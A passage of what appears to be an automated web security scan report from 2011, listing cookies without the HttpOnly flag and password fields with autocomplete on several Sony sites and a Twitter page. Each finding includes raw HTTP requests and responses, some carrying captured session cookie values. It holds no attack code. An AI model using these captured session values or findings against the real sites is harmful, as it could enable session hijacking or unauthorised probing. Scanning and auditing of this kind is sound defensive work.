Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6.19. http://www.omnitechsupport.com/sony/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.docs.sony.com/startchat.asp?modelnum=VGNNR180E&chat=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

6.20. http://www.sony.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache
Last-Modified: Thu, 23 Jun 2011 11:47:08 GMT
ETag: "16c6fb-1d30-a50c6700"
Accept-Ranges: bytes
Content-Length: 7472
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<html>
<head>
<title>Sony USA</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="pragma" content="no-cache" />
<meta name="google-site-verification" conte
...[SNIP]...

6.21. http://www.sony.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://www.sony.com/index.html
Content-Length: 276
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sony.com/index.html">here</a>.</p>
<
...[SNIP]...

6.22. http://www.sony.com/storagemedia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /storagemedia

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storagemedia HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://pro.sony.com/bbsc/ssr/cat-datastorage/cat-storagemedia/
Content-Length: 332
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b232f3660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://pro.sony.com/bbs
...[SNIP]...

6.23. http://www.sonystyle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=f5a8dd8fbe1377be8633e5a97c94fd613db8de389f7769144e0359c4

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=20e81bc3747692973bc65cdb0fe7a96ffeed7bcabbab0ab54e0359c4; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

6.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92869
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
Set-Cookie: TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 92869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- hostname: saiadsapp22 -->
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="t
...[SNIP]...

6.25. http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ReturnProductInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/ReturnProductInfo?URL=SYReturnProductInfoResponseView&storeId=10151&syncPrice=true&getProdInfo=true HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=a2f5f4c32c2bdfdeb5abca8520ca28c3722f09a76db9ae634e0359c4; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.a=1308842438745

Response

HTTP/1.1 200 OK
ntCoent-Length: 215
Content-Type: text/xml
Content-Language: en-US
Content-Length: 215
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close
Set-Cookie: TS5bbf46=bf993e9f934dbd72f3971d5cefc73a642c2d2c068de0310e4e0359c7; Path=/
Cache-Control: private
Pragma: no-cache

<?xml version="1.0" encoding="UTF-8"?>
<ajax-response>
<response type="object" id="ReturnProductInfoObject">
<productInformation id="products">
{
"products":
{
}    
}
</productInformation>
</response>
<
...[SNIP]...

6.26. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=95277153801327c970f2ee5e018528035e46b2c7608495f34e0359a9db2332020de46713222f7b4ed69e61a0

Response

HTTP/1.1 302 Moved Temporarily
Referer: http://burp/show/6
Location: http://www.sonystyle.com
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Set-Cookie: TS5bbf46=bbd31f42cd1bb660e737709398a01a9a78da968d1dfc8e8b4e0359c4; Path=/
Cache-Control: private


6.27. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73255
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
Set-Cookie: TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...

6.28. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73360
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
Set-Cookie: TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...

6.29. http://www.us.playstation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.us.playstation.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/
Content-Length: 306
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

6.30. http://www.us.playstation.com/Support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.us.playstation.com
Path:   /Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/Support
Content-Length: 313
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://twitter.com/sonyoutletusa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

